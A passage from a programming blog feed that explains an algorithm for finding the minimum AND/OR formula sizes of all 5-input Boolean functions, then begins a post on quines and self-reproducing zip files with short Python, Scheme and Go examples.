<tr><td>false <td>false <td>00<sub>2</sub> = 0
<tr><td>false <td>true <td>01<sub>2</sub> = 1
<tr><td>true <td>false <td>10<sub>2</sub> = 2
<tr><td>true <td>true <td>11<sub>2</sub> = 3
</table>
</center>
<p class=pp>
The functions are then the 4-bit numbers giving the value of the
function for each input. For example, function 13 = 1101<sub>2</sub>
is true for all inputs except X=false Y=true.
Three-variable functions correspond to 3-bit inputs generating 8-bit truth tables,
and so on.
</p>
<p class=pp>
This representation has two key advantages. The first is that
the numbering is dense, so that you can implement a map keyed
by function using a simple array. The second is that the operations
“f AND g” and “f OR g” can be implemented using
bitwise operators: the truth table for “f AND g” is the bitwise
AND of the truth tables for f and g.
</p>
<p class=pp>
That program worked well enough in 2001 to compute the
minimum number of operators necessary to write any
1-, 2-, 3-, and 4-variable Boolean function. Each round
takes asymptotically O(2<sup>2<sup>n</sup></sup>·2<sup>2<sup>n</sup></sup>) = O(2<sup>2<sup>n+1</sup></sup>) time, and the number of
rounds needed is O(the final answer). The answer for n=4
is 15, so the computation required on the order of
15·2<sup>2<sup>5</sup></sup> = 15·2<sup>32</sup> iterations of the innermost loop.
That was plausible on the computer I was using at
the time, but the answer for n=5, likely around 30,
would need 30·2<sup>64</sup> iterations to compute, which
seemed well out of reach.
At the time, it seemed plausible that parity was always
a hardest function and that the minimum size would
continue to alternate between 2<sup>n</sup>−1 and 2<sup>n</sup>+1.
It's a nice pattern.
</p>
<h3>Exploiting Symmetry</h3>
<p class=pp>
Five years later, though, Alex Healy and I got to talking about this sequence,
and Alex shot down both conjectures using results from the theory
of circuit complexity. (Theorists!) Neil Sloane added this note to
the <a href="http://oeis.org/history?seq=A056287">entry for the sequence</a> in his Online Encyclopedia of Integer Sequences:
</p>
<blockquote>
<tt>
%E A056287 Russ Cox conjectures that X<sub>1</sub> XOR ... XOR X<sub>n</sub> is always a worst f and that a(5) = 33 and a(6) = 63. But (Jan 27 2006) Alex Healy points out that this conjecture is definitely false for large n. So what is a(5)?
</tt>
</blockquote>
<p class=lp>
Indeed. What is a(5)? No one knew, and it wasn't obvious how to find out.
</p>
<p class=pp>
In January 2010, Alex and I started looking into ways to
speed up the computation for a(5). 30·2<sup>64</sup> is too many
iterations but maybe we could find ways to cut that number.
</p>
<p class=pp>
In general, if we can identify a class of functions f whose
members are guaranteed to have the same complexity,
then we can save just one representative of the class as
long as we recreate the entire class in the loop body.
What used to be:
</p>
<pre class="indent alg">
for each function f
for each function g
visit f AND g
visit f OR g
</pre>
<p class=lp>
can be rewritten as
</p>
<pre class="indent alg">
for each canonical function f
for each canonical function g
for each ff equivalent to f
for each gg equivalent to g
visit ff AND gg
visit ff OR gg
</pre>
<p class=lp>
That doesn't look like an improvement: it's doing all
the same work. But it can open the door to new optimizations
depending on the equivalences chosen.
For example, the functions “f” and “¬f” are guaranteed
to have the same complexity, by <a href="http://en.wikipedia.org/wiki/De_Morgan's_laws">DeMorgan's laws</a>.
If we keep just one of
those two on the lists that “for each function” iterates over,
we can unroll the inner two loops, producing:
</p>
<pre class="indent alg">
for each canonical function f
for each canonical function g
visit f OR g
visit f AND g
visit ¬f OR g
visit ¬f AND g
visit f OR ¬g
visit f AND ¬g
visit ¬f OR ¬g
visit ¬f AND ¬g
</pre>
<p class=lp>
That's still not an improvement, but it's no worse.
Each of the two loops considers half as many functions
but the inner iteration is four times longer.
Now we can notice that half of tests aren't
worth doing: “f AND g” is the negation of
“¬f OR ¬g,” and so on, so only half
of them are necessary.
</p>
<p class=pp>
Let's suppose that when choosing between “f” and “¬f”
we keep the one that is false when presented with all true inputs.
(This has the nice property that <code>f ^ (int32(f) >> 31)</code>
is the truth table for the canonical form of <code>f</code>.)
Then we can tell which combinations above will produce
canonical functions when f and g are already canonical:
</p>
<pre class="indent alg">
for each canonical function f
for each canonical function g
visit f OR g
visit f AND g
visit ¬f AND g
visit f AND ¬g
</pre>
<p class=lp>
That's a factor of two improvement over the original loop.
</p>
<p class=pp>
Another observation is that permuting
the inputs to a function doesn't change its complexity:
“f(V, W, X, Y, Z)” and “f(Z, Y, X, W, V)” will have the same
minimum size. For complex functions, each of the
5! = 120 permutations will produce a different truth table.
A factor of 120 reduction in storage is good but again
we have the problem of expanding the class in the
iteration. This time, there's a different trick for reducing
the work in the innermost iteration.
Since we only need to produce one member of
the equivalence class, it doesn't make sense to
permute the inputs to both f and g. Instead,
permuting just the inputs to f while fixing g
is guaranteed to hit at least one member
of each class that permuting both f and g would.
So we gain the factor of 120 twice in the loops
and lose it once in the iteration, for a net savings
of 120.
(In some ways, this is the same trick we did with “f” vs “¬f.”)
</p>
<p class=pp>
A final observation is that negating any of the inputs
to the function doesn't change its complexity,
because X and X' have the same complexity.
The same argument we used for permutations applies
here, for another constant factor of 2<sup>5</sup> = 32.
</p>
<p class=pp>
The code stores a single function for each equivalence class
and then recomputes the equivalent functions for f, but not g.
</p>
<pre class="indent alg">
for each canonical function f
for each function ff equivalent to f
for each canonical function g
visit ff OR g
visit ff AND g
visit ¬ff AND g
visit ff AND ¬g
</pre>
<p class=lp>
In all, we just got a savings of 2·120·32 = 7680,
cutting the total number of iterations from 30·2<sup>64</sup> = 5×10<sup>20</sup>
to 7×10<sup>16</sup>. If you figure we can do around
10<sup>9</sup> iterations per second, that's still 800 days of CPU time.
</p>
<p class=pp>
The full algorithm at this point is:
</p>
<pre class="indent alg">
// Algorithm 2
func compute():
for each function f
size[f] = ∞
for each single variable function f = v
size[f] = 0
loop
changed = false
for each canonical function f
for each function ff equivalent to f
for each canonical function g
d = size[ff] + 1 + size[g]
changed |= visit(d, ff OR g)
changed |= visit(d, ff AND g)
changed |= visit(d, ff AND ¬g)
changed |= visit(d, ¬ff AND g)
if not changed
return
func visit(d, fg):
if size[fg] != ∞
return false
record fg as canonical
for each function ffgg equivalent to fg
size[ffgg] = d
return true
</pre>
<p class=lp>
The helper function “visit” must set the size not only of its argument fg
but also all equivalent functions under permutation or inversion of the inputs,
so that future tests will see that they have been computed.
</p>
<h3>Methodical Exploration</h3>
<p class=pp>
There's one final improvement we can make.
The approach of looping until things stop changing
considers each function pair multiple times
as their sizes go down. Instead, we can consider functions
in order of complexity, so that the main loop
builds first all the functions of minimum complexity 1,
then all the functions of minimum complexity 2,
and so on. If we do that, we'll consider each function pair at most once.
We can stop when all functions are accounted for.
</p>
<p class=pp>
Applying this idea to Algorithm 1 (before canonicalization) yields:
</p>
<pre class="indent alg">
// Algorithm 3
func compute()
for each function f
size[f] = ∞
for each single variable function f = v
size[f] = 0
for k = 1 to ∞
for each function f
for each function g of size k − size(f) − 1
if size[f AND g] == ∞
size[f AND g] = k
nsize++
if size[f OR g] == ∞
size[f OR g] = k
nsize++
if nsize == 2<sup>2<sup>n</sup></sup>
return
</pre>
<p class=lp>
Applying the idea to Algorithm 2 (after canonicalization) yields:
</p>
<pre class="indent alg">
// Algorithm 4
func compute():
for each function f
size[f] = ∞
for each single variable function f = v
size[f] = 0
for k = 1 to ∞
for each canonical function f
for each function ff equivalent to f
for each canonical function g of size k − size(f) − 1
visit(k, ff OR g)
visit(k, ff AND g)
visit(k, ff AND ¬g)
visit(k, ¬ff AND g)
if nvisited == 2<sup>2<sup>n</sup></sup>
return
func visit(d, fg):
if size[fg] != ∞
return
record fg as canonical
for each function ffgg equivalent to fg
if size[ffgg] != ∞
size[ffgg] = d
nvisited += 2 // counts ffgg and ¬ffgg
return
</pre>
<p class=lp>
The original loop in Algorithms 1 and 2 considered each pair f, g in every
iteration of the loop after they were computed.
The new loop in Algorithms 3 and 4 considers each pair f, g only once,
when k = size(f) + size(g) + 1. This removes the
leading factor of 30 (the number of times we
expected the first loop to run) from our estimation
of the run time.
Now the expected number of iterations is around
2<sup>64</sup>/7680 = 2.4×10<sup>15</sup>. If we can do 10<sup>9</sup> iterations
per second, that's only 28 days of CPU time,
which I can deliver if you can wait a month.
</p>
<p class=pp>
Our estimate does not include the fact that not all function pairs need
to be considered. For example, if the maximum size is 30, then the
functions of size 14 need never be paired against the functions of size 16,
because any result would have size 14+1+16 = 31.
So even 2.4×10<sup>15</sup> is an overestimate, but it's in the right ballpark.
(With hindsight I can report that only 1.7×10<sup>14</sup> pairs need to be considered
but also that our estimate of 10<sup>9</sup> iterations
per second was optimistic. The actual calculation ran for 20 days,
an average of about 10<sup>8</sup> iterations per second.)
</p>
<h3>Endgame: Directed Search</h3>
<p class=pp>
A month is still a long time to wait, and we can do better.
Near the end (after k is bigger than, say, 22), we are exploring
the fairly large space of function pairs in hopes of finding a
fairly small number of remaining functions.
At that point it makes sense to change from the
bottom-up “bang things together and see what we make”
to the top-down “try to make this one of these specific functions.”
That is, the core of the current search is:
</p>
<pre class="indent alg">
for each canonical function f
for each function ff equivalent to f
for each canonical function g of size k − size(f) − 1
visit(k, ff OR g)
visit(k, ff AND g)
visit(k, ff AND ¬g)
visit(k, ¬ff AND g)
</pre>
<p class=lp>
We can change it to:
</p>
<pre class="indent alg">
for each missing function fg
for each canonical function g
for all possible f such that one of these holds
* fg = f OR g
* fg = f AND g
* fg = ¬f AND g
* fg = f AND ¬g
if size[f] == k − size(g) − 1
visit(k, fg)
next fg
</pre>
<p class=lp>
By the time we're at the end, exploring all the possible f to make
the missing functions—a directed search—is much less work than
the brute force of exploring all combinations.
</p>
<p class=pp>
As an example, suppose we are looking for f such that fg = f OR g.
The equation is only possible to satisfy if fg OR g == fg.
That is, if g has any extraneous 1 bits, no f will work, so we can move on.
Otherwise, the remaining condition is that
f AND ¬g == fg AND ¬g. That is, for the bit positions where g is 0, f must match fg.
The other bits of f (the bits where g has 1s)
can take any value.
We can enumerate the possible f values by recursively trying all
possible values for the “don't care” bits.
</p>
<pre class="indent alg">
func find(x, any, xsize):
if size(x) == xsize
return x
while any != 0
bit = any AND −any // rightmost 1 bit in any
any = any AND ¬bit
if f = find(x OR bit, any, xsize) succeeds
return f
return failure
</pre>
<p class=lp>
It doesn't matter which 1 bit we choose for the recursion,
but finding the rightmost 1 bit is cheap: it is isolated by the
(admittedly surprising) expression “any AND −any.”
</p>
<p class=pp>
Given <code>find</code>, the loop above can try these four cases:
</p>
<center>
<table id=find>
<tr><th>Formula <th>Condition <th>Base x <th>“Any” bits
<tr><td>fg = f OR g <td>fg OR g == fg <td>fg AND ¬g <td>g
<tr><td>fg = f OR ¬g <td>fg OR ¬g == fg <td>fg AND g <td>¬g
<tr><td>¬fg = f OR g <td>¬fg OR g == fg <td>¬fg AND ¬g <td>g
<tr><td>¬fg = f OR ¬g <td>¬fg OR ¬g == ¬fg <td>¬fg AND g <td>¬g
</table>
</center>
<p class=lp>
Rewriting the Boolean expressions to use only the four OR forms
means that we only need to write the “adding bits” version of find.
</p>
<p class=pp>
The final algorithm is:
</p>
<pre class="indent alg">
// Algorithm 5
func compute():
for each function f
size[f] = ∞
for each single variable function f = v
size[f] = 0
// Generate functions.
for k = 1 to max_generate
for each canonical function f
for each function ff equivalent to f
for each canonical function g of size k − size(f) − 1
visit(k, ff OR g)
visit(k, ff AND g)
visit(k, ff AND ¬g)
visit(k, ¬ff AND g)
// Search for functions.
for k = max_generate+1 to ∞
for each missing function fg
for each canonical function g
fsize = k − size(g) − 1
if fg OR g == fg
if f = find(fg AND ¬g, g, fsize) succeeds
visit(k, fg)
next fg
if fg OR ¬g == fg
if f = find(fg AND g, ¬g, fsize) succeeds
visit(k, fg)
next fg
if ¬fg OR g == ¬fg
if f = find(¬fg AND ¬g, g, fsize) succeeds
visit(k, fg)
next fg
if ¬fg OR ¬g == ¬fg
if f = find(¬fg AND g, ¬g, fsize) succeeds
visit(k, fg)
next fg
if nvisited == 2<sup>2<sup>n</sup></sup>
return
func visit(d, fg):
if size[fg] != ∞
return
record fg as canonical
for each function ffgg equivalent to fg
if size[ffgg] != ∞
size[ffgg] = d
nvisited += 2 // counts ffgg and ¬ffgg
return
func find(x, any, xsize):
if size(x) == xsize
return x
while any != 0
bit = any AND −any // rightmost 1 bit in any
any = any AND ¬bit
if f = find(x OR bit, any, xsize) succeeds
return f
return failure
</pre>
<p class=lp>
To get a sense of the speedup here, and to check my work,
I ran the program using both algorithms
on a 2.53 GHz Intel Core 2 Duo E7200.
</p>
<center>
<table id=times>
<tr><th> <th colspan=3>————— # of Functions —————<th colspan=2>———— Time ————
<tr><th>Size <th>Canonical <th>All <th>All, Cumulative <th>Generate <th>Search
<tr><td>0 <td>1 <td>10 <td>10
<tr><td>1 <td>2 <td>82 <td>92 <td>< 0.1 seconds <td>3.4 minutes
<tr><td>2 <td>2 <td>640 <td>732 <td>< 0.1 seconds <td>7.2 minutes
<tr><td>3 <td>7 <td>4420 <td>5152 <td>< 0.1 seconds <td>12.3 minutes
<tr><td>4 <td>19 <td>25276 <td>29696 <td>< 0.1 seconds <td>30.1 minutes
<tr><td>5 <td>44 <td>117440 <td>147136 <td>< 0.1 seconds <td>1.3 hours
<tr><td>6 <td>142 <td>515040 <td>662176 <td>< 0.1 seconds <td>3.5 hours
<tr><td>7 <td>436 <td>1999608 <td>2661784 <td>0.2 seconds <td>11.6 hours
<tr><td>8 <td>1209 <td>6598400 <td>9260184 <td>0.6 seconds <td>1.7 days
<tr><td>9 <td>3307 <td>19577332 <td>28837516 <td>1.7 seconds <td>4.9 days
<tr><td>10 <td>7741 <td>50822560 <td>79660076 <td>4.6 seconds <td>[ 10 days ? ]
<tr><td>11 <td>17257 <td>114619264 <td>194279340 <td>10.8 seconds <td>[ 20 days ? ]
<tr><td>12 <td>31851 <td>221301008 <td>415580348 <td>21.7 seconds <td>[ 50 days ? ]
<tr><td>13 <td>53901 <td>374704776 <td>790285124 <td>38.5 seconds <td>[ 80 days ? ]
<tr><td>14 <td>75248 <td>533594528 <td>1323879652 <td>58.7 seconds <td>[ 100 days ? ]
<tr><td>15 <td>94572 <td>667653642 <td>1991533294 <td>1.5 minutes <td>[ 120 days ? ]
<tr><td>16 <td>98237 <td>697228760 <td>2688762054 <td>2.1 minutes <td>[ 120 days ? ]
<tr><td>17 <td>89342 <td>628589440 <td>3317351494 <td>4.1 minutes <td>[ 90 days ? ]
<tr><td>18 <td>66951 <td>468552896 <td>3785904390 <td>9.1 minutes <td>[ 50 days ? ]
<tr><td>19 <td>41664 <td>287647616 <td>4073552006 <td>23.4 minutes <td>[ 30 days ? ]
<tr><td>20 <td>21481 <td>144079832 <td>4217631838 <td>57.0 minutes <td>[ 10 days ? ]
<tr><td>21 <td>8680 <td>55538224 <td>4273170062 <td>2.4 hours <td>2.5 days
<tr><td>22 <td>2730 <td>16099568 <td>4289269630 <td>5.2 hours <td>11.7 hours
<tr><td>23 <td>937 <td>4428800 <td>4293698430 <td>11.2 hours <td>2.2 hours
<tr><td>24 <td>228 <td>959328 <td>4294657758 <td>22.0 hours <td>33.2 minutes
<tr><td>25 <td>103 <td>283200 <td>4294940958 <td>1.7 days <td>4.0 minutes
<tr><td>26 <td>21 <td>22224 <td>4294963182 <td>2.9 days <td>42 seconds
<tr><td>27 <td>10 <td>3602 <td>4294966784 <td>4.7 days <td>2.4 seconds
<tr><td>28 <td>3 <td>512 <td>4294967296 <td>[ 7 days ? ] <td>0.1 seconds
</table>
</center>
<p class=pp>
The bracketed times are estimates based on the work involved: I did not
wait that long for the intermediate search steps.
The search algorithm is quite a bit worse than generate until there are
very few functions left to find.
However, it comes in handy just when it is most useful: when the
generate algorithm has slowed to a crawl.
If we run generate through formulas of size 22 and then switch
to search for 23 onward, we can run the whole computation in
just over half a day of CPU time.
</p>
<p class=pp>
The computation of a(5) identified the sizes of all 616,126
canonical Boolean functions of 5 inputs.
In contrast, there are <a href="http://oeis.org/A000370">just over 200 trillion canonical Boolean functions of 6 inputs</a>.
Determining a(6) is unlikely to happen by brute force computation, no matter what clever tricks we use.
</p>
<h3>Adding XOR</h3>
<p class=pp>We've assumed the use of just AND and OR as our
basis for the Boolean formulas. If we also allow XOR, functions
can be written using many fewer operators.
In particular, a hardest function for the 1-, 2-, 3-, and 4-input
cases—parity—is now trivial.
Knuth examines the complexity of 5-input Boolean functions
using AND, OR, and XOR in detail in <a href="http://www-cs-faculty.stanford.edu/~uno/taocp.html">The Art of Computer Programming, Volume 4A</a>.
Section 7.1.2's Algorithm L is the same as our Algorithm 3 above,
given for computing 4-input functions.
Knuth mentions that to adapt it for 5-input functions one must
treat only canonical functions and gives results for 5-input functions
with XOR allowed.
So another way to check our work is to add XOR to our Algorithm 4
and check that our results match Knuth's.
</p>
<p class=pp>
Because the minimum formula sizes are smaller (at most 12), the
computation of sizes with XOR is much faster than before:
</p>
<center>
<table>
<tr><th> <th><th colspan=5>————— # of Functions —————<th>
<tr><th>Size <th width=10><th>Canonical <th width=10><th>All <th width=10><th>All, Cumulative <th width=10><th>Time
<tr><td align=right>0 <td><td align=right>1 <td><td align=right>10 <td><td align=right>10 <td><td>
<tr><td align=right>1 <td><td align=right>3 <td><td align=right>102 <td><td align=right>112 <td><td align=right>< 0.1 seconds
<tr><td align=right>2 <td><td align=right>5 <td><td align=right>1140 <td><td align=right>1252 <td><td align=right>< 0.1 seconds
<tr><td align=right>3 <td><td align=right>20 <td><td align=right>11570 <td><td align=right>12822 <td><td align=right>< 0.1 seconds
<tr><td align=right>4 <td><td align=right>93 <td><td align=right>109826 <td><td align=right>122648 <td><td align=right>< 0.1 seconds
<tr><td align=right>5 <td><td align=right>366 <td><td align=right>936440 <td><td align=right>1059088 <td><td align=right>0.1 seconds
<tr><td align=right>6 <td><td align=right>1730 <td><td align=right>7236880 <td><td align=right>8295968 <td><td align=right>0.7 seconds
<tr><td align=right>7 <td><td align=right>8782 <td><td align=right>47739088 <td><td align=right>56035056 <td><td align=right>4.5 seconds
<tr><td align=right>8 <td><td align=right>40297 <td><td align=right>250674320 <td><td align=right>306709376 <td><td align=right>24.0 seconds
<tr><td align=right>9 <td><td align=right>141422 <td><td align=right>955812256 <td><td align=right>1262521632 <td><td align=right>95.5 seconds
<tr><td align=right>10 <td><td align=right>273277 <td><td align=right>1945383936 <td><td align=right>3207905568 <td><td align=right>200.7 seconds
<tr><td align=right>11 <td><td align=right>145707 <td><td align=right>1055912608 <td><td align=right>4263818176 <td><td align=right>121.2 seconds
<tr><td align=right>12 <td><td align=right>4423 <td><td align=right>31149120 <td><td align=right>4294967296 <td><td align=right>65.0 seconds
</table>
</center>
<p class=pp>
Knuth does not discuss anything like Algorithm 5,
because the search for specific functions does not apply to
the AND, OR, and XOR basis. XOR is a non-monotone
function (it can both turn bits on and turn bits off), so
there is no test like our “<code>if fg OR g == fg</code>”
and no small set of “don't care” bits to trim the search for f.
The search for an appropriate f in the XOR case would have
to try all f of the right size, which is exactly what Algorithm 4 already does.
</p>
<p class=pp>
Volume 4A also considers the problem of building minimal circuits,
which are like formulas but can use common subexpressions additional times for free,
and the problem of building the shallowest possible circuits.
See Section 7.1.2 for all the details.
</p>
<h3>Code and Web Site</h3>
<p class=pp>
The web site <a href="http://boolean-oracle.swtch.com">boolean-oracle.swtch.com</a>
lets you type in a Boolean expression and gives back the minimal formula for it.
It uses tables generated while running Algorithm 5; those tables and the
programs described in this post are also <a href="http://boolean-oracle.swtch.com/about">available on the site</a>.
</p>
<h3>Postscript: Generating All Permutations and Inversions</h3>
<p class=pp>
The algorithms given above depend crucially on the step
“<code>for each function ff equivalent to f</code>,”
which generates all the ff obtained by permuting or inverting inputs to f,
but I did not explain how to do that.
We already saw that we can manipulate the binary truth table representation
directly to turn <code>f</code> into <code>¬f</code> and to compute
combinations of functions.
We can also manipulate the binary representation directly to
invert a specific input or swap a pair of adjacent inputs.
Using those operations we can cycle through all the equivalent functions.
</p>
<p class=pp>
To invert a specific input,
let's consider the structure of the truth table.
The index of a bit in the truth table encodes the inputs for that entry.
For example, the low bit of the index gives the value of the first input.
So the even-numbered bits—at indices 0, 2, 4, 6, ...—correspond to
the first input being false, while the odd-numbered bits—at indices 1, 3, 5, 7, ...—correspond
to the first input being true.
Changing just that bit in the index corresponds to changing the
single variable, so indices 0, 1 differ only in the value of the first input,
as do 2, 3, and 4, 5, and 6, 7, and so on.
Given the truth table for f(V, W, X, Y, Z) we can compute
the truth table for f(¬V, W, X, Y, Z) by swapping adjacent bit pairs
in the original truth table.
Even better, we can do all the swaps in parallel using a bitwise
operation.
To invert a different input, we swap larger runs of bits.
</p>
<center>
<table>
<tr><th>Function <th width=10> <th>Truth Table (<span style="font-weight: normal;"><code>f</code> = f(V, W, X, Y, Z)</span>)
<tr><td>f(¬V, W, X, Y, Z) <td><td><code>(f&0x55555555)<< 1 | (f>> 1)&0x55555555</code>
<tr><td>f(V, ¬W, X, Y, Z) <td><td><code>(f&0x33333333)<< 2 | (f>> 2)&0x33333333</code>
<tr><td>f(V, W, ¬X, Y, Z) <td><td><code>(f&0x0f0f0f0f)<< 4 | (f>> 4)&0x0f0f0f0f</code>
<tr><td>f(V, W, X, ¬Y, Z) <td><td><code>(f&0x00ff00ff)<< 8 | (f>> 8)&0x00ff00ff</code>
<tr><td>f(V, W, X, Y, ¬Z) <td><td><code>(f&0x0000ffff)<<16 | (f>>16)&0x0000ffff</code>
</table>
</center>
<p class=lp>
Being able to invert a specific input lets us consider all possible
inversions by building them up one at a time.
The <a href="http://oeis.org/A003188">Gray code</a> lets us
enumerate all possible 5-bit input codes while changing only 1 bit at
a time as we move from one input to the next:
</p>
<center>
0, 1, 3, 2, 6, 7, 5, 4, <br>
12, 13, 15, 14, 10, 11, 9, 8, <br>
24, 25, 27, 26, 30, 31, 29, 28, <br>
20, 21, 23, 22, 18, 19, 17, 16
</center>
<p class=lp>
This minimizes
the number of inversions we need: to consider all 32 cases, we only
need 31 inversion operations.
In contrast, visiting the 5-bit input codes in the usual binary order 0, 1, 2, 3, 4, ...
would often need to change multiple bits, like when changing from 3 to 4.
</p>
<p class=pp>
To swap a pair of adjacent inputs, we can again take advantage of the truth table.
For a pair of inputs, there are four cases: 00, 01, 10, and 11. We can leave the
00 and 11 cases alone, because they are invariant under swapping,
and concentrate on swapping the 01 and 10 bits.
The first two inputs change most often in the truth table: each run of 4 bits
corresponds to those four cases.
In each run, we want to leave the first and fourth alone and swap the second and third.
For later inputs, the four cases consist of sections of bits instead of single bits.
</p>
<center>
<table>
<tr><th>Function <th width=10> <th>Truth Table (<span style="font-weight: normal;"><code>f</code> = f(V, W, X, Y, Z)</span>)
<tr><td>f(<b>W, V</b>, X, Y, Z) <td><td><code>f&0x99999999 | (f&0x22222222)<<1 | (f>>1)&0x22222222</code>
<tr><td>f(V, <b>X, W</b>, Y, Z) <td><td><code>f&0xc3c3c3c3 | (f&0x0c0c0c0c)<<1 | (f>>1)&0x0c0c0c0c</code>
<tr><td>f(V, W, <b>Y, X</b>, Z) <td><td><code>f&0xf00ff00f | (f&0x00f000f0)<<1 | (f>>1)&0x00f000f0</code>
<tr><td>f(V, W, X, <b>Z, Y</b>) <td><td><code>f&0xff0000ff | (f&0x0000ff00)<<8 | (f>>8)&0x0000ff00</code>
</table>
</center>
<p class=lp>
Being able to swap a pair of adjacent inputs lets us consider all
possible permutations by building them up one at a time.
Again it is convenient to have a way to visit all permutations by
applying only one swap at a time.
Here Volume 4A comes to the rescue.
Section 7.2.1.2 is titled “Generating All Permutations,” and Knuth delivers
many algorithms to do just that.
The most convenient for our purposes is Algorithm P, which
generates a sequence that considers all permutations exactly once
with only a single swap of adjacent inputs between steps.
Knuth calls it Algorithm P because it corresponds to the
“Plain changes” algorithm used by <a href="http://en.wikipedia.org/wiki/Change_ringing">bell ringers in 17th century England</a>
to ring a set of bells in all possible permutations.
The algorithm is described in a manuscript written around 1653!
</p>
<p class=pp>
We can examine all possible permutations and inversions by
nesting a loop over all permutations inside a loop over all inversions,
and in fact that's what my program does.
Knuth does one better, though: his Exercise 7.2.1.2-20
suggests that it is possible to build up all the possibilities
using only adjacent swaps and inversion of the first input.
Negating arbitrary inputs is not hard, though, and still does
minimal work, so the code sticks with Gray codes and Plain changes.
</p></p>
Zip Files All The Way Downtag:research.swtch.com,2012:research.swtch.com/zip2010-03-18T00:00:00-04:002010-03-18T00:00:00-04:00Did you think it was turtles?
<p><p class=lp>
Stephen Hawking begins <i><a href="http://www.amazon.com/-/dp/0553380168">A Brief History of Time</a></i> with this story:
</p>
<blockquote>
<p class=pp>
A well-known scientist (some say it was Bertrand Russell) once gave a public lecture on astronomy. He described how the earth orbits around the sun and how the sun, in turn, orbits around the center of a vast collection of stars called our galaxy. At the end of the lecture, a little old lady at the back of the room got up and said: “What you have told us is rubbish. The world is really a flat plate supported on the back of a giant tortoise.” The scientist gave a superior smile before replying, “What is the tortoise standing on?” “You're very clever, young man, very clever,” said the old lady. “But it's turtles all the way down!”
</p>
</blockquote>
<p class=lp>
Scientists today are pretty sure that the universe is not actually turtles all the way down,
but we can create that kind of situation in other contexts.
For example, here we have <a href="http://www.youtube.com/watch?v=Y-gqMTt3IUg">video monitors all the way down</a>
and <a href="http://www.amazon.com/gp/customer-media/product-gallery/0387900926/ref=cm_ciu_pdp_images_all">set theory books all the way down</a>,
and <a href="http://blog.makezine.com/archive/2009/01/thousands_of_shopping_carts_stake_o.html">shopping carts all the way down</a>.
</p>
<p class=pp>
And here's a computer storage equivalent:
look inside <a href="http://swtch.com/r.zip"><code>r.zip</code></a>.
It's zip files all the way down:
each one contains another zip file under the name <code>r/r.zip</code>.
(For the die-hard Unix fans, <a href="http://swtch.com/r.tar.gz"><code>r.tar.gz</code></a> is
gzipped tar files all the way down.)
Like the line of shopping carts, it never ends,
because it loops back onto itself: the zip file contains itself!
And it's probably less work to put together a self-reproducing zip file
than to put together all those shopping carts,
at least if you're the kind of person who would read this blog.
This post explains how.
</p>
<p class=pp>
Before we get to self-reproducing zip files, though,
we need to take a brief detour into self-reproducing programs.
</p>
<h3>Self-reproducing programs</h3>
<p class=pp>
The idea of self-reproducing programs dates back to the 1960s.
My favorite statement of the problem is the one Ken Thompson gave in his 1983 Turing Award address:
</p>
<blockquote>
<p class=pp>
In college, before video games, we would amuse ourselves by posing programming exercises. One of the favorites was to write the shortest self-reproducing program. Since this is an exercise divorced from reality, the usual vehicle was FORTRAN. Actually, FORTRAN was the language of choice for the same reason that three-legged races are popular.
</p>
<p class=pp>
More precisely stated, the problem is to write a source program that, when compiled and executed, will produce as output an exact copy of its source. If you have never done this, I urge you to try it on your own. The discovery of how to do it is a revelation that far surpasses any benefit obtained by being told how to do it. The part about “shortest” was just an incentive to demonstrate skill and determine a winner.
</p>
</blockquote>
<p class=lp>
<b>Spoiler alert!</b>
I agree: if you have never done this, I urge you to try it on your own.
The internet makes it so easy to look things up that it's refreshing
to discover something yourself once in a while.
Go ahead and spend a few days figuring out. This blog will still be here
when you get back.
(If you don't mind the spoilers, the entire <a href="http://cm.bell-labs.com/who/ken/trust.html">Turing award address</a> is worth reading.)
</p>
<center>
<br><br>
<i>(Spoiler blocker.)</i>
<br>
<a href="http://www.robertwechsler.com/projects.html"><img src="https://research.swtch.com/applied_geometry.jpg"></a>
<br>
<i><a href="http://www.robertwechsler.com/projects.html">http://www.robertwechsler.com/projects.html</a></i>
<br><br>
</center>
<p class=pp>
Let's try to write a Python program that prints itself.
It will probably be a <code>print</code> statement, so here's a first attempt,
run at the interpreter prompt:
</p>
<pre class=indent>
>>> print '<span style="color: #005500">hello</span>'
hello
</pre>
<p class=lp>
That didn't quite work. But now we know what the program is, so let's print it:
</p>
<pre class=indent>
>>> print "<span style="color: #005500">print 'hello'</span>"
print 'hello'
</pre>
<p class=lp>
That didn't quite work either. The problem is that when you execute
a simple print statement, it only prints part of itself: the argument to the print.
We need a way to print the rest of the program too.
</p>
<p class=pp>
The trick is to use recursion: you write a string that is the whole program,
but with itself missing, and then you plug it into itself before passing it to print.
</p>
<pre class=indent>
>>> s = '<span style="color: #005500">print %s</span>'; print s % repr(s)
print 'print %s'
</pre>
<p class=lp>
Not quite, but closer: the problem is that the string <code>s</code> isn't actually
the program. But now we know the general form of the program:
<code>s = '<span style="color: #005500">%s</span>'; print s % repr(s)</code>.
That's the string to use.
</p>
<pre class=indent>
>>> s = '<span style="color: #005500">s = %s; print s %% repr(s)</span>'; print s % repr(s)
s = 's = %s; print s %% repr(s)'; print s % repr(s)
</pre>
<p class=lp>
Recursion for the win.
</p>
<p class=pp>
This form of self-reproducing program is often called a <a href="http://en.wikipedia.org/wiki/Quine_(computing)">quine</a>,
in honor of the philosopher and logician W. V. O. Quine,
who discovered the paradoxical sentence:
</p>
<blockquote>
“Yields falsehood when preceded by its quotation”<br>yields falsehood when preceded by its quotation.
</blockquote>
<p class=lp>
The simplest English form of a self-reproducing quine is a command like:
</p>
<blockquote>
Print this, followed by its quotation:<br>“Print this, followed by its quotation:”
</blockquote>
<p class=lp>
There's nothing particularly special about Python that makes quining possible.
The most elegant quine I know is a Scheme program that is a direct, if somewhat inscrutable, translation of that
sentiment:
</p>
<pre class=indent>
((lambda (x) `<span style="color: #005500">(</span>,x <span style="color: #005500">'</span>,x<span style="color: #005500">)</span>)
'<span style="color: #005500">(lambda (x) `(,x ',x))</span>)
</pre>
<p class=lp>
I think the Go version is a clearer translation, at least as far as the quoting is concerned:
</p>
<pre class=indent>
/* Go quine */
package main
import "<span style="color: #005500">fmt</span>"
func main() {
fmt.Printf("<span style="color: #005500">%s%c%s%c\n</span>", q, 0x60, q, 0x60)
}
var q = `<span style="color: #005500">/* Go quine */
package main
import "fmt"
func main() {
fmt.Printf("%s%c%s%c\n", q, 0x60, q, 0x60)
}
var q = </span>`
</pre>
<p class=lp>(I've colored the data literals green throughout to make it clear what is program and what is data.)</p>
<p class=pp>The Go program has the interesting property that, ignoring the pesky newline
at the end, the entire program is the same thing twice (<code>/* Go quine */ ... q = `</code>).
That got me thinking: maybe it's possible to write a self-reproducing program
using only a repetition operator.
